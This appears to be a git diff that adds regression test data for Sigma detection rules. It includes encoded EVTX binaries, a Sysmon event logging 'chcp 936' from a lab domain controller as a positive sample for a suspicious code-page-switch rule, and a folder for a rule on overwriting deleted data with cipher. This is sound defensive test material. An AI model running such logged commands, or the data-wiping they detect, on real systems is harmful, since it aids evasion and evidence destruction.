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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json new file mode 100644 index 000000000..fc3726adb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:28:28.958645Z" + } + }, + "EventRecordID": 11905446, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:28:28.957", + "ProcessGuid": "5AA13A44-08BC-68FD-2336-000000004002", + "ProcessId": 8208, + "Image": "C:\\Windows\\System32\\chcp.com", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Change CodePage Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CHCP.COM", + "CommandLine": "chcp 936", + "CurrentDirectory": "C:\\Users\\Administrator\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=0489A9D0B4342F9C87C03510E0073898864946A5,MD5=0714C0100E008D00EC82E7B549595F69,SHA256=A807B535F7176642FC87911D185C10B00981388CDA68F5B8E2FF4C73FF514352,IMPHASH=75FA51C548B19C4AD5051FAB7D57EB56", + "ParentProcessGuid": "5AA13A44-08B2-68FD-2136-000000004002", + "ParentProcessId": 3204, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml new file mode 100644 index 000000000..20c85ba02 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml @@ -0,0 +1,13 @@ +id: a67c0d0c-3b40-4fef-a39d-5bd528255d90 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c7942406-33dd-4377-a564-0f62db0593a3 + title: Suspicious CodePage Switch Via CHCP +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/c7942406-33dd-4377-a564-0f62db0593a3.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx b/regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/4b046706-5789-4673-b111-66f25fe99534.evtx new file mode 100644 index 0000000000000000000000000000000000000000..a7dd2dc9b98beecf66b8e3f9ed4417a5a1ab8f7e GIT binary patch literal 69632 zcmeHQ34D~*wZAh-CL3AU6c==&6ctIxz9E{)Bm>A|4B#5YKmv)9MG^#xOP;&6MR@gD zmA>cttNQ#EtV&(5+QqhLZBd^KkB1iZRc*`bYcalRh35VL_q#W(LVVa#)3e`# z_mhD2l(*lyGBDYAmk=kX3Gqpa5FaN8J`th;_orbP;y}0G>?hAdsFT}x)XD9yD*emq zKJRV7y(J;=oPq1l)F8>xA$4@9vY7V~bv_4aeJJzUkaC!2sG9>g_%ho>J(y#YdD0}% zG)D~5|NaS2%y_eYrz6MV5F;G>7Io(9+&n*HVA}-`R{HjS@aU)qH{wm0$}>{jk5j%N zw`WJBhTU3iF`1OdzxYLR> z%{VW>u^o4oi!NMsi6ux`fa@;YpCVS`StpLgq7c7QoE3^n{I?EP-xGA@bPNpa0j)IM zy5_sYJh2)j_sSZ<;GThj^8uHp=wH^Pi3VBw6{xEPsg~nuId-3B###T8Ean2(4m=bh zJ6kwh=P7_5#c$6b@k~~Rb4w8LcrTDZtH2_&NMID}^W@m^D!g2#LX@PM6 zo=oAD$q2_X35iB)6Vmy7s)c9#B|~^nVlMzExAfvot#Y$dMUIO?fn+cH`AEU4t&;do z5i(_wT?Pg^P=^*GPj61g3#^iWuaFg4xJP~`C2CQD7SZ<> zq=DEZ+6v^b5G=&;Na51bddX~;Sb#TX-RiAJh|x*O*&{_>vKWP=U`)A#kI|i3@0cdW ziZp?a4O=qKxTlE>nGV_I{X$&jiX1Tm$G6k-WGT9@6n$E1?j9k;!;q%G_`wflt`syC zZYivK4qy%zW%=S<-0K8Jx`3S?;K&k39k}ik3oEfOSE4-v$s-rC_K+xJawVt%v*lBZ^6Hhc^BklDp2@!oU%{mR(CDgPmA_C zS!^@zQ)*V>$Ud4}_>Hb)NHSK+r$=FTQCg;;x<=4$8OWn0rZWp9A)&vf@*n9>oeEO+ z0%N*SJF@^0)8?zRlJr)|nISB%#jZ2UDRP+S6qV-~fBE6fq(wNhl0+KQ=c)9hzJfjl zEX8h#eCo^s8%2c02W;~#gT=5jDQtUXhQlq4$ z3}e$|OIwY!X;#__^`69!de2<&4WU?yy%Xt|3H?5Ps-;JH6RRd-ikv-LmO_l7K@nrN zHF{;6ri7)|P=`D`=UY)g6W&ZKH)&2jV{29LCJ#1wXVwTSl`XYrqpYQ}W%;=SLY6Su za-To_OuUCPE8FU*G^d~HhhQXlliv;~wWs+?o}Ib9G)RFtSP^#I0^R!UnK8<0|C*y0@BLHO}8%ECvPs!4XX zRtw8P3yYNBdcV=u`$cG-{=9*$Xv`4djl@%9t^A|~xnjH@GZ{hf>Q2F#bp&!G3yK*h zM0tS{>lFE?;oPV0QOr-m4*1X;Iz%n@V(jb!*j-p%ghSj2Dam`hF2{40!F2gjDJ>Rd zI4go$%Ih-W#(4!4-4a|?<8C?XFU5J0sH?v3f;-apwN+EM6gAG%G6g!*YS9$ZLo@}c zJ1nOOt%MST9IzbawMzYfbr#5-%5e#5sl;^=AUIi-Sc?`%Db*tHmm?MP6vylRf<0R}z5g4K50(TaM3N7g~f(*#+>zPS@` z*@e4QTA6-6ejb!I3pIPtn@vZ}(aIrxZ#(CUwh!)ZB!PuK(k_|-{4E9j=Hbi(3QPm1 zRDfa?z<)W)CGEV}tMK#Sx*pF<<^3X@l}I=$@m~opEl2)(nY#$NOYyuOJTe)&M;*?m zA$1*|*5Sx<>hLSXeWvo^SBQElWIe2*3T2g|#B!8fffTj)pRAxHH3u?NqJkb?MS{e?0;?|M)=--(pkowK*? zWSUB7iT92>ke1jX+mqD>PXGi%ZNb6$+<@jlIZTLN+VS97n#RFxjM^mo@ez){kKg&x zKn7)>5Njc)l0~YGUdpz#3aykp&mMzvWiHOCMbZYPey%mj0ckCzlH(IRwyOuTJ$JtL{jl)~ zJI$W2s5SdsoKr+wV%yT}k5!uec|Ze2cqfjJ2x|61bfr6hqduI8K3(ICcXMXaGJX}0 z^gx50M{KVEyuAoftf=BYfAC!N^IHNQyk@tL( zgUC;mXOwJZ@>zvEviFi$KP$iY2|$5dn2$b1LuU91(%?|lTjZ!>AU}0TZW5wDuX>pIN!Mt{ zPak8PQbT6=DQ5f>d-+5Se1+yG_IsSo;db4+GhdINe6rJ9bd4`px%(%2oiiU3kIgRP z44=|lG-L_MPto-jWibWnEnSj|LcI0#jc>${j&}WwuJM}AN3NZ-W%1l^Y`Ayo)mNv! zLpna02ir$MmXLHjT=W)cCu+ICW4EH(b8lx}@Wim{ExJZKJ$M2PW(}F)rPhW`5E&+VN8j26{APhM!`_PqEiqN-+*vs`-ii-g3oHw>9qgLHy*C zo!+8rj5OY&AxlVp+MnJc$6*8YmL5gNk+*;QiTKgcPH)jQUa`yFKWER~o;&BAe%AIn zfCIf{GN$!4WC=;f!$ohACy%8S0aD}Hpe(_3_n`R||o+M|u>vo@w&KViz>9(Yo3bXn@bnFQJE)4uT@o-}_y-@bQUfq<9^tp?==ipjy{g z@84Yv(Cq!XJpj<&pBsa7!e`^hZSTK54XN$?wxu`X5dF1}Mj284w6R`UMD))dgNG6P zvf-={%^w@X4Prlj*fmHJ&Hq}y=KlSzB~Fuu=x@!XXwm$vXXCkVKmOGR>Q}u0Wk&L+ zu9Wpf^P`ULKTYyR^_y-)g1Gog7o%W%KWX%`!Zkep(J!UZivqs%s8Viye|ltf1EWf4 z|LBE3`JsG}1bM>k(DRQL)2F45+txm3-sG7MZ_=fo|LqS-{5b{&C<&waLQlmT1^Yms zh&!%e2@};Dn*N)?CFI$a5Ya<=PFVgjyZj^JGllhqn4G64XsA!<0{B+d!KYMtP|pl2 zv&gQ@oG4{lexl05dU{xSQ|!vi4k|A=W&yo&;nG9jSW5R`jL`=;4Ck3ar3HGTD&OoO zV~#;Fmcwta6%&P#Fz2$oX@`ut$YolXOFh7M4J5eHhO2?QoU_??x*^gB62= z@hY_Eurn)Nj3NHnD+c3V`ZtI2d^)^x=!v!r{%tIi|KPNIeuwJ!OJ7L({nDS2-iAjW zy|=BI-735dd*O9>EEY2yypL)yPlo#QHNk_d8IdQy)fxH54G&8z;sL#5=b*H&%WL|oS8GmS@~el55G?{-3J)Qe zmcSFR1$ZhRgejb>qHzQHqX50%Z2V5e`;`Loivr#-ytJY4DEX7oZx($C|K2a-5zJQW z#!joifn9IB)+*RuM>bp&afADNkbA}g1eH`IFJl1$7oicjj0MO@TE+s55+N(x0{rX7 zU<>dPV*wfq5MnmiW-t~Y^gDa2(pZ2x#%2n_IvNXb|51u!VR6s`{1z<0)ye{F8E-5= z#=|idpnsHrwzshWhc-%aC|Q771*`uftUhf4{tD+$U^jDsRxD>@0U8TX508e#QZ^P~ z6btZ)usOh2p9r=9n~eo%EI?xc27Wyt#gT(~4r2iZ#ScHE=KyO$<^W4^J(SqLhu0k7 zR@c6^-zf`l@&s)GhR=b7&ZwM=2*Guj8=QfeKgQKHbA7ZOhc@?W=K6+;r+>V;zPacH z7z20#jx!L;w-GCG=3^GT3A2%BVLrx#BV%TB_WB$=V>D!IbK_t)+ozSSNB=j#*4u{j zr;M#pj2Z_i&yHv-S3D3AXhX8C%cTdgz+WY#*#U>q~LQ)*Be|O3g!K zwvXS2`Nv=H`FPsCHg`F-$r|U2Sm-{~Z&>tzuQ_tj3rmk*v1-My(^!1Kg0cAgU(Sie zob;(!L2OocvW1F>t2?#AC4L)V@4bNYhm5^v>^)=e8GBEDslX+Li2h0vFG9bPWcU5k zhr;Z=$6g4w_ZAy_&)9q5CS&gzd+)II@8kD86T{xiQ}*8V_$-XQz1M?p@Nx#P6;_`9 z>S*9M3yt^Q{=F&9j9%i-=*8N5Pb*lCj{@wwU*dd|vG0t1XY4y;-yMW~w<*lNJLYG> z_Fapy?~HwC>^rk|^Kg#ea(cqpcPA+OZs$=4V&Czr@oi@1CgRL=$@xq(k7wrbremdL z6V_k0U>u|!?W0|eiZBXNujGD|=oue9tP5_JD~e2%7A!ky zMRV+tVG9w!$3$sCz`C?3K6-gB#_2p7KehG!>iahZ#p!HSc3#S%8>h4HpFT~0`r*{` z8(*qD{^(8L{j?7sXQ5z3oX%dH9@=p_Jz+Lfgs7Fl>t?1SW@kJ4puyOjLyo=}Tux9t z&XO=#5Qi{4f@U(j5_;sSCdS@$F!m!ogMw%J5G5i!X9^l7*N8D@rZY>$+Z=Kf&_KU9 z9c{2v&8|7KToxo1VUWmRRiP0iUGS=C##^*Wf#J+bwQ_sIa-VAV9wYD`JQGjzxX@sEzXw`*9iGrV~*i7f8+K3cL{`T`*p!Pii+SalRaU zXRT>lBsHKWr10m=$LFl57q#NUX}wZ&UOKo2Fdi^mAt7o)P3@pTFf2{rwk|+Rc)BH> z7`4OlTB`?qT%XtrPns@pB%@aHEA4dk?!mqUPx4jT7F@5y-F$f5a2AZEc8Z1Y#Oaop zpzhZ$?-5h;z*`=~!xk&b6RF&Qw{;c6PLO7NUzk}nvi(n?#1t76nsfoI&AzZ^dg(pSkky}0W| zNfwkWyBy`!Aw?N}706wQltn1L9_a{w1%4$stB_ZOwoJmzl8a>dgtSkM;&pQE zq<@wmeijGgb$0#7-nLf@(N-}+@QOpv_(ik*%@-St1!#@weRXk7jZfclHd$~5Jcre%kyx3TP#sV}Jpz-=UoW1@M#{zs^S%8&!#sV}JU^iCVns4@TEx2CK z-Go)phuc@%wF)-0uRhFI3R|d`BKmM_ZtQmRjAyD`UU3zZ`L_o6(@dHq#8xaSn5}M4 zn78(>qw9A%q%Wdl-=fa^iAXgHPwC>oUF)Q{4R55e*hk8*4TeS3l{x=2T zw@+C<>ZW4EOg-f^EZ`$dEjgjc5 zAxlU(I;8fu9a6SI(Qnk~-^a22O>tQLU`INdzO#>Y_URf2-p!eLEN=XnGM^jTALXZp zEFtMv{np*jegx%)DgYIVhp}sgBUz*>FGZ~h7NBSEkaN29cWjrwfs3U_A6IR5p^xuI zFHf(=W$^o3jNE0oDuQlMjJ|&ryaHQsZ#C+&ydPs-ZXRF@^-e4}h`Io%75O|D7_$%uXT-@uP+JVYYkb#^K~|O+KOS6rg%G5d8k@(T1ANe zYC+J``QU5%K=Z4N!C!J@M2T*Ye*j;4#8xB!`A5DWf82>5D$0y_uheJFa zpf~CoHGc%ky^j&#NJEy8{P9W79lIC8j$)gk-uMQ1L~r(yeJ!76i(@>Xd$;s{4YylD zxrE$A&v$OMgdHy&3tDeEBqv^VGfU zwejT3(GKvX(;=P-;7eU&B)-&;B_v;7J7SS<;4Z7%Azxa3ajN7`_Q%}yMuVT*KP`GmumItqD7J*%P-U)ul5>g)gef-XkZhO?yuhuGFu+x=7`zqDUM!5X(>l~#)PRwim2oD=PG{MoqyvU z?zr)j-FUsO@sH2A`zvStpyv8}o*Q#RF~9*oalBqbmXQ2(K;!k43+E|1{@?aVmz)qc zI@-wvU1RG5?*1P)&G2l#de)3ruCwU46CV!IkR>D?4_mo#zT&5eM{fS-X>sExJGr21 zwCiUm7c^uE$xjC?7cNkAJZs{lMW@G&j&^cE*EoDz5Nyqre1uy!1 z_WMOrODKd!!1!*A-9{~ean;J?S&`HX@)2vTR%#B6{>G=J&^4-XFT(sj`EO*qDrBnUDWUJon-* zV_jB2u9f4uB$|A>Nb%FwZ@d20JFNVqYyA09?*8Ab`}E9BSKnHl@=bsP`E)Nr=4!|c zKgEonhQU6*Sn<>L;ya#=A3xdY!MetOYjyWu_tAUxo8Q@RLDnpbpQs0G$P$vD4pSwCiVH!Bnb-EFtL_A3b;&}p3>9mg*DWYwf^rKg14r@Q7YqaZU{(O=jvV@ci@!_X9_cP?D#fqQO+fMxT@bZ(c Z(T<;5+rAdo;JA;BaHh@)BYIXVcd z>!|GR;Nz^i?h$pwgQAYQx}wMTs<14$D7%Z!vU?P9R|lEw_tjrTzy9uYq&tFLf1khq zS3Pdsd+XM{RduWCS{Hj;TAM`h;Z!fWadnC$A#xqTL5}*_{oSE+k2(>PfWd&lfWd&l zfWd&lfWd&lfWd&lfWd&lfWd&lK(836YhCPVZd)p}bsz59&6Ln7uq983bse9V^_p-m z0hrHe1#3R?4>mkih%?iL_&P<1&y)SX2r&ciC!!moug5#R#CaHb@)(XhdHkOW|E7A+ zcN_3-aS%M`;rUzDNpeb19?Mi(jQgm%uSZxf(tIu`9fpbaZ~zBC91aIu0*v%h$1ae_qeK^B$`7e!uszK@UBSk}#AzPdtEI7Ldnt z15-quxJopMHqnLWn{lRIu0B4WlOk4%Wug@yJMkgKQ6`!ZtV=8xjQqX+oF< zxG%u91#db;JD%FbVuUQfb35LT6D#no4cB5(h+ir03PmOUn~r4P8SvzE^zM3`POoOhDSwqLrUBSx_$Wkn zws54*Rs3+)kYsVbxKhT%ryP-!Hz^1)RBOmRFRkD7yxeZ$r5i;mLIlfB0+*oNG!}dvj>O)gylv=(gNXu z1DV1jgAtBa35iB)1HyT|s)i5vYJhMf#V!C&Zs|fvt#q@~L{2J&0?A(XTApCmR!S^W zm`GV z9mFQlu0#wA!9t8ch*T}D7f($Ub5LUDtx7#moRE~9ohL>ni$Mqq#*`=c7|oeg#&j`6 zqzg1`IFfP4GhGaj;SgQEFT_)>$PtrpeIa9{OhvbqqFYPN{R4$~1k!ZV*U!jUDX1zu zQkZo;U=9>z`Ql={YXe5wft^m^$P!1(@Z2WmS1!MJ%qx35f0&y3P0JmJ{-v++$H`hr zR1nt|&l0beXuo!HSEX)Hc%Qjw!hFXCx4wRO&fgFI1mt8WQ1}DfvQ6eudp+4ti}qTX z>;k-})U3jlZ8W*?*X_xWWXzObPsW)_X_4#R6M&Zm#66p*-QiUh=74#`! zDK<;wQ)d>~C@d^qV4I~36vNJ}ln8NZ5uS}7IeYmLdO5RFBjCqsni_#qiXCTGT72*nbdZ3y2gba{MK%ZN}CD<@)#oIO>hLX4q85o5MF zdSsoZgr(L{i#WVzsVJZcZ>ANSG$)_2wkmj&k5qYQ)<7$iEw!g2ttGN%`M3i@mN40J zpD+Aml*5^oZ8cPy)6e!nkOv-RJ)^Q>VT^K$qSvZ*R{R``vr1G6n5Qa1HaLsrZUTH- zviVwOXBMR`p!}JNIm8z;6#|Kh5>=*7z?f%+w1sg7LTU_KoTD2EA3g?I_@H`EEX&5$ zs$n^(Vd3IiRd zxGREM%I7lS!hHo4-4gu9<82}GuR^|6qIUfK^WMrh-0Y!lDXN{LAa*?n(-71`Gz6$S zB}laawS>Cia-`KHbpz&CAWtgBB~Xkj@mz%5&s3?^ptey$HOlwp2*o%>GFBz-3dLE- z-AdI3*j>n@9XU|@?8H--r$yOHGZ3opBs5hLA&Kf zn{_^#zesUN#XBxK)V%k;nIxmoS6V-lfTJbA+brCp2;ZN42e17 zkGS(9ty=k&Q5n@)d!t5YRrVwIg}n7HDpoiwk%m7 z-$-jEm~U+K-Ke?Nr_=g$KBWUkO(|a*0eW$L2=uH6A(ZNqu6%w-n&a%!j8cE53+#_}SF4?E!4+(8he=N9A!hC4-E}XP% zJCAf1^F1+SY5QH!2fbo0!qr35qGh!R_$k7#3h@@>S1Gl@QoOIiTUtRCxGzN-g`iy{ z-c{ni5pPSNNz%rly`|wPKt79+TixW(3@wX$WlUGPxoBTnYnL0SN 